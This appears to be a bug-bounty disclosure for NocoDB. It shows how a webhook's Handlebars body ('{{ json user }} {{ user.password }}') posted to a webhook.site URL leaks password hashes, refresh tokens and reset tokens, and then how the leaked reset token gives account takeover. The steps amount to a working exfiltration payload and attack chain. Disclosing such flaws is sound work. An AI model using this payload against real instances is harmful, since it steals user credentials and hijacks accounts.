Description

Through the Webhook functionality, the attacker is able to use Handlebars to capture sensitive user data.

Capturing the email_verification_token, which through the API I found the PasswordForget function, enabling account takeover via password reset.

Steps

1. • Create Table
2. • Select your table and configure WebHook:

URL: "https://webhook.site/#!/XXXXXX"
METHOD: "POST"
EVENT: "After Insert"
BODY:  "{{ json user }} {{ user.password }}"

3. • Save Webhook and invite a victim for project.
4. • Victim insert anything in table.
5. • Attacker will receive a similar response

{
  "id": "us_******",
  "email": "victim@gmail.com",
  "password": "$2a$10$wMm3MPZEyx.MYEC0*******",
  "salt": "$2a$10$wMm3MP*******",
  "firstname": null,
  "lastname": null,
  "username": null,
  "refresh_token": "4fe1fbc72603a810f57db95b2a2********",
  "invite_token": null,
  "invite_token_expires": null,
  "reset_password_expires": "2022-06-07T22:12:34.750Z",
  "reset_password_token": "3175d930-4557-4d**************",
  "email_verification_token": "716c8943-e4a7-************",
  "email_verified": null,
  "roles": "editor",
  "created_at": "2022-06-07T19:31:30.670Z",
  "updated_at": "2022-06-07T19:31:30.670Z",
  "isAuthorized": true
}

6. • Using API, reset the password of the user who obtained the reset_password_token

Endpoint_final: "https://nocodb-xpl.herokuapp.com/api/v1/db/auth/password/reset/ + reset_password_token"

7. • Set new password and account takeover.

Proof of Concept

https://drive.google.com/file/d/1BLqcEHmPIE6sj9JeC6sCSEPB6dQVWXSk/view?usp=sharing

Impact

The attacker is able to capture sensitive user information such as: password, salt, refresh_token, reset_password_token, email_verification_token.

Through reset_password_token it was possible to use the API to change the victim's password.